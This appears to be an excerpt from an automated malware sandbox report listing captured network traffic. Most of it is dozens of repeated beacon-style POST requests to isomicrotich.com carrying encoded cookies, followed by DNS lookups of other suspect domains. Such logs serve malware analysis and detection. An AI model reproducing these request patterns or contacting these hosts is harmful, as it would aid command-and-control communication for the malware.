                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F25078 InternetReadFile,9_2_00F25078
                  Source: global trafficDNS traffic detected: DNS query: tiguanin.com
                  Source: global trafficDNS traffic detected: DNS query: bazarunet.com
                  Source: global trafficDNS traffic detected: DNS query: greshunka.com
                  Source: global trafficDNS traffic detected: DNS query: isomicrotich.com
                  Source: unknownHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache
